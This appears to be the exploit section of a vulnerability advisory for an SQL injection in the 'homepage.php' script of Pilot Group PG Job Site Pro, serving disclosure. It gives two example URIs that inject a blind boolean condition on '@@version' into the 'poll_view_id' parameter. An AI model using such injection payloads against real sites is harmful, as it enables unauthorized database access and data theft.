• info
• discussion
• exploit
• solution
• references

Pilot Group PG Job Site Pro 'homepage.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )

http://www.example.com/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )